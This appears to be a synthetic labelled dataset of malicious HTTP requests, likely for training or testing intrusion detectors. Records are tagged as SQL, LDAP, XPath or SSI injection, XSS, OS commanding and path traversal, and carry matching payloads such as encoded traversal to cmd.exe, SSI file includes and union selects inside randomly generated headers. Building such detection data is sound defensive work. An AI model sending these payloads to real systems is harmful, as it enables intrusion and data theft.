Via: 1.4 35.151.29.63, HTTP/0.5 www.aaTaOee.jpg
Transfer-Encoding: deflate
Upgrade: ontd/7.5, eEr1lt/2.5
X-Serial-Number: 42967168718609635
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37403
Start - Id: 37745
class: LdapInjection
GET /iakrao1llqyn/k0a1x0Vxl@Oq/QIdfTZYchildCAXs/ljZIb8r2ZRGn.htm?ewsRa=122%29%28%26%28objectClass%3D4er%29%28%7C%28sn++%3D++++hsuc%29%28cn%3Del7+J*%29%29&irov3pst=08&e2h1kondttu=sock_streamO&thRynqgllssy=st%29ma HTTP/1.0
Host: 192.192.52.164
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: a1hhg-ha1sgnk;q=0.5, ahlscp-wi;q=0.2
Cache-Control: only-if-cached
Client-ip: 214.57.144.226
Cookie: fhijkeolg=o rom;rintirnn=1;ch9tlleectyue=anrpp
Cookie2: $Version="6"
Date: Thu, 11 Aug 05 24:53:25 UTC
ETag: W/"6L-X_u4z8Jt7prV8D"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 07 May 06 02:23:23 CET
If-Unmodified-Since: Wed, 06 Dec 06 02:28:58 CET
If-Match: *
If-None-Match: "LxGAl68DV4gusbfD_vE"
If-Range: Fri, 09 Dec 05 01:42:19 GMT
Max-Forwards: 147
Pragma: ntps=s0ei
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 87-4317
Referer: /mnHxd/lesnos/heattm/m7teyt.css
Trailer: Pragma
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 9.3; O2-hh; rv:1.7.1) Gecko/95472447
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 842x443
Via: 6.2 76.136.109.186
Transfer-Encoding: eahW
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37745
Start - Id: 49699
class: XPathInjection
GET /sro6N4Arx.aspx?vc4kshutdownperlF=rr4mA%27++or+count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28+++i++++%2B++++j++%2B+++k+%2B++++l+%2B+++1%29%5D+%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%27tin%27+++%3D+++%27+++++tai%27+or HTTP/1.1
Host: www.4chyan.gov
Connection: itoi6jcS
Accept: application/*, text/*;q=0.0
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: l-sreiEdye;q=0.1
Cache-Control: no-store
Client-ip: 251.247.9.85
Cookie: cmdb1OgWtTQh=tLwx@1w7zPB;tmpBidcinsertl@R=eht
Cookie2: $Version="03"
Date: Mon, 09 Feb 04 10:49:16 GMT
ETag: W/"s3klw_r.kke6tQh"
Expect: iazqtree
From: tmHtei@9Eaetn4.de
If-Modified-Since: Mon, 04 Jan 10 03:07:35 GMT
If-Unmodified-Since: Sat, 02 Dec 06 17:19:34 CET
If-Match: "a@y2@-2rgEL840pQ"
If-None-Match: *
If-Range: *
Max-Forwards: 95
MIME-Version: 8.1
Pragma: haHRt=R
Proxy-Authorization: uusu eemhe=Ssod
Authorization: aizl celi3ol=Reesi
Range: -394122
Referer: /5Kaet/btem5nc/isre3tam/eft1.tar
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: attoa (vWP.Ix; sURKm9l; pBSt4Xr)
UA-CPU: StrongARM
UA-Disp: 2722,5111,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6094x1402
Via: HTTP/7.0 www.oe5nl.jpg, 9.6 www.Parxds.js, 5.6 207.194.62.105:89
Transfer-Encoding: compress
Upgrade: ierniu/6.4, ytteh/9.3, ahoito/8.8
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 961902739764518
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49699
Start - Id: 40816
class: SSI
GET /clrtxLwdRQfu/aA-l/rjZMbz4Fte4VKqRSSCEe/bacc7u.png?eaAlegr8nowm5oX=7&detguiwm6o=%3C%21--++++%23odbc+++statement+%3D++++%22select++++Blkye%2C+omn%2C+++++4ol+++from+++++o2meRso+++order++++by+++0%2C+++++13%2C++++4%22+--%3E&dnutrdT=allejo HTTP/1.1
Host: 41.111.1.13
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 89.161.138.91
Cookie: hhpo=[
Cookie2: $Version="9"
Date: Tue, 26 Feb 08 04:23:31 CET
ETag: W/"whybu@XGd8ZnOdij9"
Expect: zy1Nra
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sun, 25 Feb 07 24:47:14 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 05 Jul 07 10:50:24 GMT
Max-Forwards: 6745
MIME-Version: 3.0
Pragma: son='empe1i'
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: Digest nonce
Range: 8-,53016-,755940-70410
Referer: http://www.itEi.net/9pTten.mp3
TE: gzip,trailers,chunked;q=0.6
Trailer: Trailer
User-Agent: Mozilla/3.8 (compatible; Konqueror/7.4; Windows NT; itstw)
UA-CPU: StrongARM
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.5 www.iaev.tiff, FTP/4.0 www.epOps.shtml, 2.6 17.167.40.108
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: osd5g/7.7, cplms/1.4, dtwnv0/2.5, h9zg/0.0
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 17196143235816087076
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40816
Start - Id: 42468
class: SqlInjection
GET /ltailshxa/EgyTTIcflocationU1/uSfZCI@n4LDpQgH0SF/shteiemns/is7rlyhrqosegeTmees/gE@mB5Kx_8Fjui/PLzhb43tp_l/rliiNcllvleltshu/Gca/6NcqJg2includeN/8mlruicE9/lohaOt.mdb?eaxEm=lshascopy&hetoa=24886&Sy=eAn&oetmamgamvc=1961&z5aPatqeu=89813&peues=789&6eep0hoGmlcdy=zknR_9h-FODQ&s5ltee=015&Aaaxutixtn0dtt=oauaci&Xjmberla=%3B+++exec+++++get_cust%28+++%27x%27%27++union+++++select++object_name%2Cobject_type%2C%27%27x%27%27+from+++user_objects++++where+++++%27%27eE%27%27+%3D++++%27%27++++%27+++%29%3B&trep7ip=saa&7l8euhn=xp_&lmcin9dEm=69564885 HTTP/1.1
Host: www.smpe.com
Connection: l3d8xt
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: compress;q=0.7, compress;q=0.6, gzip;q=0.5, gzip;q=0.5, identity;q=0.5
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 88.195.225.227
Cookie: opt1null7yQm-Sc=9cR;ilpet=alxmle;hee=ai;ceed=;D;meiiaekaL7g=i3;Ndcsevieeno=sastasmh
Cookie2: $Version="3"
Date: Wed, 25 Feb 09 06:31:56 GMT
ETag: W/"@dg_HmJm7tTPjS6Y_y"
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Fri, 07 Jan 05 03:07:10 CET
If-Unmodified-Since: Sun, 13 Mar 05 03:49:30 CET
If-Match: "-U7FdqCWo.2VbJWTuB_"
If-None-Match: *
If-Range: "NJd1NRKicrJPiTZwtjU"
Max-Forwards: 218
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 7an4e 9cqe4e=chEots
Range: 909400-,77915-,-01017
Referer: http://6tAao.uk/teXo/ohad.txt
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: chVdf/6.0.9.6.2
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/8.9 www.bNermra.jpeg
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42468
Start - Id: 48633
class: XPathInjection
PUT /oEfeg/dshheiceta/hu2RHx3kUh6Kp/xpOtsaaprrbbasOtegl/wMayY_/nJ298ch/lI10seNleph/e9loefZ4oi/nUQ8igxUr.jsp? HTTP/1.1
Content-Length: 480
Content-Language: tn30tg
Content-Encoding: gzip
Content-Location: /eeeaa/rUfktNi/Tezvoew/njntt.tar
Content-MD5: b2FuaWVleXJhaEZ0dGdFYg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 02 Apr 05 16:31:26 CET
Last-Modified: Wed, 25 Apr 07 23:27:32 GMT
Host: 117.88.122.122
Connection: keep-alive
Accept: application/*;q=0.4, video/*;q=0.0, audio/basic;q=0.6
Accept-Charset: utf-8, windows-1251, x-mac-japanese
Accept-Encoding: *
Accept-Language: pEi-soa, tdete-IiTummdt, l4n9zl-i3;q=0.6
Cache-Control: no-transform
Client-ip: 212.18.180.154
Cookie: Eb0Y=ratDrosi;o5=553;o3ze5eAtHiue=1aamocha7<ea1iej;96XsbwQ=lsiig;tOasn=ht;aThatu=ti
Cookie2: $Version="9"
Date: Fri, 11 Aug 06 02:14:24 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: nIa1=ttl7lssu;IeiaDaia
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Sat, 31 Jul 04 01:27:04 CET
If-Unmodified-Since: Fri, 03 Dec 04 20:10:26 CET
If-Match: *
If-None-Match: "ETknoUyrhJSSRp0c"
If-Range: Thu, 08 Dec 05 02:29:33 CET
Max-Forwards: 9
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="39AABfB2d62AF480C2dD2Fe8b3CE4C25"
Authorization: eyris 6av6=zara
Range: -046912,8351-4,007308-22
Referer: /refr3Eo.cfm
TE: deflate;q=0.7,trailers
Trailer: Range
User-Agent: Mozilla/9.7 (X11; U; Linux i386 3.8; xl-p5; rv:7.2.2) Gecko/08280923
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: HTTP/3.1 66.162.17.172
Transfer-Encoding: gzip
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 498858561497
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0il=stsock_stream&lkereodtseeh=o24H&hYF1sEt.EaFg=orbe&pah=t4'    or  count(  path/child::node()[position(   )=((  i  +    j    + k  + l   +   1)]  | path/child::*()[position()=(k+1)])=1   or   'xtt' ='   rmxndyz'    or&5ari2Uddx=sboot.ini&srl=]mkAli&tqiueg=e1n(t%ifOty&E8opthtpassYDZMc=4956044189&iNutluberDtr=6136060905&muHe1g7e4r6e=e0TUskcdhttps&ktym8eaihha=avyHHCE7S.mf&yn77hllNoiy=tfQ67Lu3Q

End - Id: 48633
Start - Id: 41454
class: SqlInjection
PUT /oaUsn/oewnhho2eEwyeoo45Gp/vctohmo30axsa3o/yeP.d/qcmdI3ohDQ/ctEsxahTixttdrrodgr/%uV/e2kfnh-EECA52z9E.F8/eq1O31U@OaR.php3? HTTP/1.0
Content-Length: 212
Content-Language: i0lsatei,hdq,toe
Content-Encoding: identity
Content-Location: /hqvf.ace
Content-MD5: b2J3dmFlb25wZWRkRXRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Apr 06 24:02:37 CET
Last-Modified: Mon, 05 Apr 04 16:58:21 GMT
Host: 197.114.152.158
Connection: smicoe
Accept: */*
Accept-Charset: windows-874;q=0.3
Accept-Encoding: compress;q=0.8, deflate, deflate, deflate, identity
Accept-Language: 7pe-viiR, n1-re2dit, st9m-ire, f-nsdg0sun;q=0.4, ttlKnsr9-o;q=0.7
Cache-Control: no-cache
Client-ip: 29.250.237.27
Cookie: ssfltmtevyLm=ntn1exeepaD6er;4ws13gasaI=aa0diFs8ejnoa
Cookie2: $Version="17"
Date: Mon, 22 Sep 08 10:34:23 GMT
ETag: W/"UtjPHEnCvSW5I-JRNNL"
Expect: 9andtaCf=tTse
From: utrstns@Temsn.st
If-Modified-Since: Sun, 28 Sep 08 04:31:58 UTC
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: "2v3lzvV5sAL2aYxaIp"
If-None-Match: "2tQJvZHTfV7Fv335fG"
If-Range: "A6dE0CMJSLmqFf1d"
Max-Forwards: 553
MIME-Version: 2.7
Pragma: nren='eyd'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: http://www.oeam.com/ibeio/ctoa3sL4/drme/ocnei4d/omtmetn.msf
TE: deflate;q=0.2
Trailer: Expect
User-Agent: 1ro2hfeottmlOfc
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: utnba
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

souirqtu3kuu=sOeotvHevZK&drobyegidu=aQad&u7rtb=35534104&ieuns=2278922&cbodyOfdSA=or     0<>(select  count(*)     from     r7ak7ee)&laThg6=vwS6vjsiYnts9dG&aigrpliey=Hsxei&eweueHtX2Km=1ea+o&ayo7=j nsl

End - Id: 41454
Start - Id: 40928
class: SSI
GET /lpeerfardkdco5oeott/PZusrDV/eZaPPZ_5ZTeGXW/oe/Aauaxwechod0lzO/inJ/avlUHQHpo/aausyqd/ng1etoLuklyimvb8az/F44WQ/Azlib4tobject_fRT35ni/swOYnHCs.sh?nYtXufromhOlink-=gz+feote&siy1lh2shcm=%3C%21--%23odbc++connect%3D%22degeE%2Chhe1h%2Cl9B2%22++++++++statement%3D%22select+++*++from+esy%22--%3E&SnIidHealeers14=3787&tgi=eixaieuhOd0st&3erptza=hservices5mobjecttai7udkfitwindow.openh&nph-bgsound5SGnulls=gyT HTTP/1.1
Host: www.bbuptewweo.st
Connection: pj1aii
Accept: */*
Accept-Charset: windows-1254, x-mac-icelandic;q=0.4, cp-950
Accept-Encoding: gzip;q=0.6
Accept-Language: codeiyae-iI1s;q=0.3
Cache-Control: 0Rnts='sTp'
Client-ip: 120.251.255.184
Cookie: olzeicnee=n;itncppmsh=2@h3;teMg2dhdi=353010;nxoh0dhiwrojo=2903kA;ecdas3eecEheee=80786848
Cookie2: $Version="50"
Date: Mon, 07 Nov 05 12:18:04 CET
ETag: W/"8masr5MiUJT4dyo4siJ"
Expect: nBhmshg
From: ioOee@owoeu.be
If-Modified-Since: Wed, 03 Jan 07 20:20:50 GMT
If-Unmodified-Since: Sat, 23 Oct 04 17:19:44 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1728
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic bGVKc3d0OndWMGU=
Authorization: NTLM cnJhc2VzdWFjdEd2ZU5xZGVkZW43ZXJzYXRyclJ0cm5zdA==
Range: -25
Referer: /grso/adenftAg.mp3
TE: trailers,trailers,deflate
Trailer: Accept
User-Agent: Mozilla/6.6 (Machintosh; U; PPC Mac OS X 2.5; 0v-tN; rv:5.1.8) Gecko/40956359
UA-CPU: PowerPC
UA-Disp: 613,8082,8
UA-OS: Linux
UA-Color: color16
Via: 5.0 www.0ssgu.tiff:09837
Transfer-Encoding: compress
Upgrade: datbe/5.7
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 60.122.216.106
X-Serial-Number: 163741114628927
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40928
Start - Id: 46546
class: XSS
GET /"><img src="javascript:alert(document.domain)">? HTTP/1.0
Host: 239.118.244.162
Connection: a6fv
Accept: video/mpeg;q=0.2, image/*;q=0.1, image/png;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: max-age=147
Client-ip: 23.69.31.217
Cookie: lsiiaet4oF3lu6o=tkraourtesmdlrsey;NbF@2IOy=EbeyemmrnSw
Cookie2: $Version="0"
Date: Tue, 21 Nov 06 14:48:04 CET
ETag: W/"u2fAqilJFYAF0Ew"
Expect: atpSh=pnachAn
From: ns7rogjc@npah.it
If-Modified-Since: Sat, 17 Jun 06 03:18:15 CET
If-Unmodified-Since: Sun, 08 Jun 08 23:39:43 GMT
If-Match: "iLOhLxoR3j4_-XKb."
If-None-Match: "hPGt9QnybP6VRaKXg"
If-Range: Wed, 30 Dec 09 11:28:25 CET
Max-Forwards: 91
MIME-Version: 6.0
Pragma: nLt4dRoh='eara'
Proxy-Authorization: Digest username="rgww0see"
Authorization: Digest uri=/heoeOt8.bin
Range: 2794-2,-4107
Referer: http://aex3e7m.be/endA/amIektQl.doc
TE: trailers,trailers
Trailer: Pragma
User-Agent: srsqsfwq6/6.7.3.9
UA-CPU: 68000
UA-Disp: 884,253,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 139x000
Via: 3.6 www.leDaou.jpeg, 1.5 36.110.101.55
Transfer-Encoding: nip2l; nnsesgog=Metol
Upgrade: m51if/7.5, rhhtal/3.2, em5Twu/2.8, pvaaul/4.8, ar9/6.0
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 907134703793407479
----: ---------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 46546
Start - Id: 40400
class: SSI
POST /bspnoeUfteiana8h9/cxmlbinQMCVkM/sKyhjQWZhN/ltyo.html? HTTP/1.0
Content-Length: 222
Content-Language: n9l5ynuj,itoUtx
Content-Encoding: gzip
Content-Location: http://www.ttvoed.cz/6toheh/Aotla/aCrduoe/gsd4witm/etonsp.php
Content-MD5: b2loYW9JbmNuaWFhZzU4ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Aug 07 23:00:39 UTC
Last-Modified: Thu, 05 Nov 09 23:43:43 UTC
Host: www.ehbatd.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip, compress;q=0.6
Accept-Language: 1ntrirAk-nEeOdlu;q=0.5, n-rocsiete
Cache-Control: no-cache
Client-ip: 16.69.2.56
Cookie: s9leNiph=ih:oA;es1=aletTrTaoa;moROobrnuhtir=9537
Cookie2: $Version="13"
Date: Sat, 19 Aug 06 09:38:08 UTC
ETag: "dzp3joQvsU@HpXG-X"
Expect: 100-continue
From: tTQl@hy8nl.be
If-Modified-Since: Wed, 21 Jan 04 10:15:48 GMT
If-Match: "fPtIf57Fs53.WE3fbMJ"
If-None-Match: "5SdyTB56Xusv-C.fULwo"
Max-Forwards: 75
MIME-Version: 4.2
Pragma: no-cache
Authorization: Digest opaque="znlumm"
Referer: /kauaiEG/vsSernAN/aeiq.txt
TE: trailers,deflate,trailers
User-Agent: Mozilla/9.8 (compatible; MSIE 7.5; SunOS sun4u; OsolUr; 8eaoekgu5a)
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: s9qavf/3.0 231.238.89.235:446
Transfer-Encoding: nker
Upgrade: anoNn/3.2, nnna/8.2, etrp7h/2.8
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 24.137.231.7
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sa2esntbsxohic=hotyanjicInoe&Cw.Wg8fDYs=<!--#include   virtual="c:\winnt\system.ini" -->&3s6we=lxht&i4kn-=571788&pzbinbLr=15530&uIBh=Aocu&M_0KQg=e9~ 6ee;ea wh4  td&akunyos2ziar=8933553&be9trno=e :

End - Id: 40400
Start - Id: 44477
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 20.91.89.232
Connection: 4Sshk
Accept: */*
Accept-Charset: iso-8859-9, macintosh;q=0.7, x-mac-turkish;q=0.2, windows-1250, euc-jp;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: alnosst=eu2ttn
Client-ip: 1.111.16.222
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="51"
Date: Sun, 11 May 08 04:20:38 UTC
ETag: "BP2RT5N@ZqZCyLZ"
Expect: nets=rpaui;afeisve8=e88t
From: bniw@mamjmaT.net
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Tue, 19 Oct 04 16:18:28 CET
If-Match: *
If-None-Match: "G3i8kwl2xodSAkFP"
If-Range: *
Max-Forwards: 594
MIME-Version: 3.4
Pragma: e='etee'
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: NTLM YTdrd2ZuaWVuM2ZhYWVlb2x6dDRyZWFpdE5oaGU0aG9ldA==
Range: 31467-04,46-
Referer: /haaLns.asmx
TE: trailers,trailers
Trailer: Trailer
User-Agent: mosrXha (chvCSse2P; 1yEV6ps_DR; jB@vcFZ-)
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4559x569
Via: FTP/9.6 155.59.249.63, 8nwen/7.4 93.239.96.201, HTTP/7.0 151.80.204.98
Transfer-Encoding: gzip
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44477
Start - Id: 49689
class: XPathInjection
GET /csonpncSnduifeoo/t9zEFmSmVxgbva_5xclp/fbin45Z7-WjH/4Br0.bin?nf=t%3Dhdn%3Ctg%5C+perlfe&9SCF=tmwirep&ireplnbl=te-&K4iF7=da&I.@VEIdlc=retta%27%5D+%7C++P+++++%7C+%2F%2Fuser%5B++++name%2Ftext%28+%29++++%3D+++%27ihn&wrfomt=%28zgosaoryhpnunionamw+&fe=nheeJjandnuecho HTTP/1.0
Host: www.htalb.st:76
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 31.16.198.186
Cookie: ldeq0h=ysLA6bB3CnA;uw=sN2wA;q6ejseedtq10s=3594552493;oJniD4VuH=slhasIansmrRted1
Cookie2: $Version="176"
Date: Wed, 18 Jan 06 05:31:26 CET
ETag: W/"rxcndMh1TvLBsYH"
Expect: Aahhoh
From: h9cdqge@khpde.com
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Wed, 22 Nov 06 16:25:00 CET
If-Match: *
If-None-Match: ".rzd6rqmI.@wp3BRxDX"
If-Range: *
Max-Forwards: 4117
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: Basic amFucm86YWVOdW9l
Range: -394122
Referer: http://www.ooaAsfB6.be/oD2saet8/rcpt/yutioa2/diwynbi/ev7es.exe
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/2.3 (compatible; 2anlnmeoen; Mac OS X; shnao)
UA-CPU: StrongARM
UA-Disp: 764,428,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: HTTP/6.2 165.5.134.195, hhe/3.6 www.Yaein5.htm:9827, 9.7 www.eslld2F6.png
Transfer-Encoding: compress
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49689
Start - Id: 35818
class: XPathInjection
GET /mNk..5-UW/xoelLegolErdndzai/ZCYVH9homeZThp@P0.htm?oa=ei4Can2olteh&oxEce3p=uemrtbrunnagawt&a5rajt5=et%3AetLE3rne&nnclTeneh=%5Dacinclude&ineltolt=dPs3&3ZydocumentO@@=385326&r1j5qzdoxqnq=eebio%27%5D+++++%7C+++++P+%7C+++++%2F%2Fuser%5B+++++name%2Ftext%28%29%3D+%276y&ogirnwga6aj=8&1ddixr=81117910&ldoadd2ie=46oeasislwkoar&n8hublmg9eensb=7046009358&23aDl=lap_%409&daisooust8niiet=eF6tHtAgM&snomoeRn5=w HTTP/1.0
Host: 53.86.54.108
Connection: close
Accept: */*;q=0.1
Accept-Charset: gb2312;q=0.1, cp-932;q=0.4, cp-950;q=0.9, utf-8, x-mac-ce;q=0.8
Accept-Encoding: 
Accept-Language: r6t0e7-Xdahr;q=0.3, ee-aR, 9-bncn, oy3-t82l3iv9
Cache-Control: no-store
Client-ip: 28.3.128.251
Cookie: o7zeida1rmsonle=ts3edH1cisfseSe5te;vEGcn=dassntoArUiFe;dsClr=wglrlt4d8awfnr5hae;2c3oIgrZora=pd$o;nc6=bZ00l
Cookie2: $Version="2"
Date: Thu, 31 Dec 09 11:43:09 UTC
ETag: "F.kqxYY8TNuKf1u"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Sun, 16 Jan 05 02:53:56 GMT
If-Unmodified-Since: Sat, 09 Feb 08 15:51:28 GMT
If-Match: *
If-None-Match: *
If-Range: "pe.OsHtJFIrMR1m"
Max-Forwards: 148
MIME-Version: 7.4
Pragma: mf2t=easweAts
Proxy-Authorization: luLc Okt8e=3llo
Authorization: tiECe mero=eestwii
Range: 205-0247
Referer: /daeiqt/eee3nte/rnirEfKh/dusl.fgf
TE: trailers,gzip,deflate
Trailer: Via
User-Agent: Mozilla/6.2 (Windows; U; WinNT 7.4; nr-eS; rv:4.4.4) Gecko/09474275
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: enaEsh/7.3 93.96.205.177:2, FTP/9.8 137.136.214.140, 9.5 www.bhth8ims.png:438
Transfer-Encoding: ue4i; rsnq=mehldssa
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 952 www.gere3lt.gif "ajcLu" "Fri, 03 Aug 07 19:36:17 GMT"
X-Forwarded-For: 43.11.206.228
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35818
Start - Id: 44346
class: OsCommanding
GET /scripts/file.bat" "& dir c:/ .exe? HTTP/1.0
Host: www.rouiYiohad.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-ce, utf-7, iso-10646-ucs-2, x-mac-roman, iso-8859-8-i;q=0.8
Accept-Encoding: *
Accept-Language: eau3-hEod8rh
Cache-Control: only-if-cached
Client-ip: 26.48.188.250
Cookie: eoencoxteaYre=douj;7ciso9onq73tno=90783647
Cookie2: $Version="06"
Date: Sun, 11 Jun 06 13:35:04 GMT
ETag: "nTSEc@7ERM9WccIu9IhT"
Expect: 100-continue
From: reco@dgiEee.cz
If-Modified-Since: Mon, 15 Mar 10 09:15:38 GMT
If-Unmodified-Since: Thu, 05 Jul 07 03:45:43 GMT
If-Match: "K5p5zjQs5Xru@bq"
If-None-Match: *
If-Range: Sat, 13 Mar 10 05:58:32 UTC
Max-Forwards: 81
MIME-Version: 5.3
Pragma: Eiilnn='tisHs'
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: a9cb rpta8oc=nteya
Range: -61939,-108
Referer: /tdrj9iat.jsp
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 5.5; rs-t1; rv:7.2.4) Gecko/48475018
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 673x399
Via: 6.3 154.254.103.28
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44346
Start - Id: 46060
class: PathTransversal
